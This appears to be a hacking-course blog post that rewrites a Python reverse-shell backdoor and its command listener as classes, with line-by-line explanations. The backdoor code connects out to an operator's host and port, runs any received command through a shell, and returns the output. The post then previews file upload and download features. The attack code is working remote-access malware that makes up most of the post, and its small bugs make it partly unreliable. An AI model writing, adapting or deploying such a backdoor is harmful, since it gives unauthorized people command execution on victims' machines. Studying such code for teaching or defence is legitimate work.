Backdoor 03 : Converting backdoor and listener into OOP

#Please preview Backdoor/Listener before continuing this

#Click-to-open 

#CODE: 
Converting listener into class(OOP)
  1. #!/usr/bin/env python

  2. import socket
  3. class Listener:
  4. def __init__(self, ip, port):
  5. listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  6. listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
  7. listener.bind((ip, port))
  8. listener.listen(0)
  9. print("[+]Waiting for incomming connection")
  10. self.connection, address = listener.accept()
  11. print("[+]Got a connection from" + str(address))

  12. def execute_remotely(self, command):
  13. self.connection.send(command)
  14. return self.connection.recv(1024)

  15. def run(self):
  16. while True:
  17. command = raw_input(">> ")
  18. result = self.execute_remotely(command)
  19. print(result)
  20. my_listener = Listener("10.0.2.15", 4444) 
  21. my_listener.run()
      #EXPLANATION
      line-4 = 
      • class Listener:
      We have to type class to define a class followed by the class name.
      And this is going to be our listener.
      So we're going to call it Listener.
      Note the capital at the start of the word, this is a convention when you're writing programs in Python to capitalize the first letter in the name of the class.

      line-5 = 
      • def __init__(self, ip, port):
      Now, the next thing that I'm going to do is I'm going to create a constructor.
      So this is a method that gets executed as soon as the class is created.
      So it's something that initializes the class.
      So to create a constructor, we do def __init__
      Now I want to establish a connection and listening on a specific port whenever the object is created.
      So I want this to be executed automatically whenever the listener object is created.
      And therefore, We are going to put our code in our CLASS which get executed at the start of our script.
       line-6-12 = 
      • listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
      • listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
      • listener.bind((ip, port))
      • listener.listen(0)
      • print("[+]Waiting for incomming connection")
      • self.connection, address = listener.accept()
      • print("[+]Got a connection from" + str(address))
      our code takes two variables, it takes the port(eg:4444) and the IP(eg:10.0.2.15) to listen to.
      So We are going to add two arguments to our constructor, which are IP and port.
      • listener.bind((ip, port))
      This will allow the user to use different IPs and different ports whenever they create the listener object.
      • self.connection, address = listener.accept()
      convert this to an attribute of my object by saying self
      We are be able to access the self.connection from anywhere with in my code as long as that code is part of the class.

      We are going to create a new method here and we'll call this method run.
      line-18-22 =   
      • def run(self):
      •      while True:
      •          command = raw_input(">> ")
      •          result = self.execute_remotely(command)
      •          print(result)

      And whenever I use the connection variable, we're going to call it self.
      We're doing this so that any time we're trying to use the connection object, we're actually using the
      attribute of our class, of our listener class.

      for send and recive command we put this in new method called  execute_remotely, And this will take command.

          line-14-16 =
      •         def execute_remotely(self, command):
      •            self.connection.send(command)
      •            return self.connection.recv(1024)

      And in here, we're going to send the command through our connection and we're going to return.
      Whatever we receive and in our run method, we're going to say 
      result = self.execute_remotely(command)

      And this is going to pass the command.
      This way, every time I need to implement a new command, I'm going to start implementing them and processing
      them in here.

      line-24-25 = 
      • my_listener = Listener("10.0.2.15", 4444)
      • my_listener.run()

      Now, you can import this listener class in a different file and use it from that file, just like we did in our key logger code to use classes.

      Alternatively, you can actually create an instance of this class and use it within this file.

      Now, in order to create an instance of this class, we create a variable and
      we'll call it my_listener.

      And this is going to be equal to listener.
      We'll have to pass to the IP, which is 110.0.2.15, and this is the IP of the local machine followed
      by the port 4444 to listen on and then to run this class
      we're going to say, my_listener.run().

      And We are Done here!

      #CODE: Converting backdoor into class(OOP)
      1. #!/usr/bin/env python
      2. import socket
      3. import subprocess

      4. class Backdoor:
      5. def __init__(self, ip, port):
      6. self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
      7. self.connection.connect((ip, port))

      8. def execute_system_command(self, command):
      9. return subprocess.check_output(command, shell=True)

      10. def run(self):
      11. while True:
      12. command = self.connection.recv(1024)
      13. command_result = self.execute_system_command(command)
      14. self.connection.send(command_result)
      15. connection.close()

      16. my_backdoor = Backdoor("10.0.2.15", 4444)
      17. my_backdoor.run()
      #EXPLANATION
      line-5 = 
      • class Backdoor:
      we define our class by typing class, followed by the class name, which we call Backdoor.

      line-6 = 
      • def __init__(self, ip, port):
      than we define a constructor by doing  def __init__
      and this is going to take self as an 1st argument and similar to the listener.
      We are going to make it to take the IP and the port as arguments.

      line-7-8 = 
      • self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
      • self.connection.connect((ip, port))  
      As we know in the constructor, we put the code that we want to be automatically executed
      when an instance of this class is created.
      In here, we will execute these two lines, 
      which will create an instance of a circuit which we were executing at the start of our script.
      And make sure it's indented properly

      basically, as we know these two lines, the first line will create an instance of the connection of a socket and then the second one will connect to a specific IP and port.
      So in here, we use the IP that we are taking as an argument and the port.
      And as usual add self before the variable name so that this will be an attribute of the class.
      And this means that we'll be able to access this instance or this variable throughout the whole class,
      [If you use pycharm ,pycharm will say by red-underline to where to put self]

      line-10 = 
      • def execute_system_command(self, command):
      • return subprocess.check_output(command, shell=True)
      similarly we put our code in class and put self as a 1st argumment so that it's a proper method of the class.

      line-13-18 = 
      • def run(self):
      •         while True:
      •             command = self.connection.recv(1024)
      •             command_result = self.execute_system_command(command)
      •             self.connection.send(command_result)
      •         connection.close()
      So we are going to define a function will call this run and it will take self as an input.
      and indent other commands in it

      line-20-21 = 
      • my_backdoor = Backdoor("10.0.2.15", 4444)
      • my_backdoor.run()
      we can create another file and call this from that other file but
      When we get to packaging, you'll be able to package the two files as one file.
      Or you can do what I did with the listener and just create an instance of this class at the bottom of
      the class so we can create an instance of it by typing a variable name.

      So let's call this Backdoor.
      This is going to equal to a backdoor class, so this will create the object for me and it will pass,
      first of all, the IP, which is 10.0.2.15 and the port that we want to connect to, which is 4444

      And then we're going to say, my_backdoor.run() to run the back door.
      And we are done!


      NOW WE HAVE MODEFIED OUR CODE
      OUR CODE CAN EXECUTE SYSTEM COMMAND AND STRINGS
      TO ADD MORE FEATURES LIKE
      ○ Command execution.
      ■ dir/ ipconfig
      ○ Access file system. 
      ■ cd directory name 
      ○ Upload files. 
      ■ upload filename.txt 
      ○ Download files.
      ■ Download filename.txt
      WE NEED TO DO SOME MORE MODIFICATIONS IN OUR CODE



      Post a Comment

      If you have any doubts, please let me know

      Previous Post Next Post